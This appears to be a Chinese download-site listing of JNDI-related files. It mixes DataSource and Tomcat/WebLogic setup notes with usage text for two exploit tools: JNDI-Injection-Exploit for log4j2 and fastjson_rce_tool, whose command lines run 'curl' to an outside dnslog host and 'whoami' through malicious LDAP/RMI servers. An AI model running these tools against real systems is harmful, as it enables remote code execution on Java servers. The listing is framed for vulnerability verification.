JNDI DirContext工厂的工作原理非常类似于JDBC DataSource，返回了现成的DirContext对象。

java asm jndi_JNDI-Injection-Exploit，用于log4j2漏洞验证 可执行程序为jar包，在命令行中运行以下命令： $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器，即"open /Applications/Calculator.app") -A - 服务器地址，可以是IP地址或者域名。 (可选项 , 默认地址是第一个网卡地址) 注意: 要确保 1099、1389、8180端口可用，不被其他程序占用。 或者你也可以在run.ServerStart类26~28行更改默认端口。 命令会被作为参数传入Runtime.getRuntime().exec()， 所以需要确保命令传入exec()方法可执行。

EJB中JNDI的使用源码例子.7z

获得JNDI的名称实现对数据库的连接

JNDI-Injection-Exploit-1.0-SNAPSHOT-all

weblogic下配置JNDI数据源，希望对大家有帮助

Tomcat5.5+myeclipse6.0+sql server2000,将包解压后，将JDBC驱动程序jar包放到Tomcat/commons/lib目录下，然后导入项目，发布项目，起动tomcat，动行jsp页面

jndi jar jndi jar

支持在java中访问名字服务器,名字服务器的目的是把名字服务对象绑定, 并且提供一种使用名字来访问对象的方法,绑定后的对象可以供任何人访 问名字服务是一种能够为给定的一组数据生成标准的名字的服务,在 Internet上,域名系统就是一种名字服务

fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp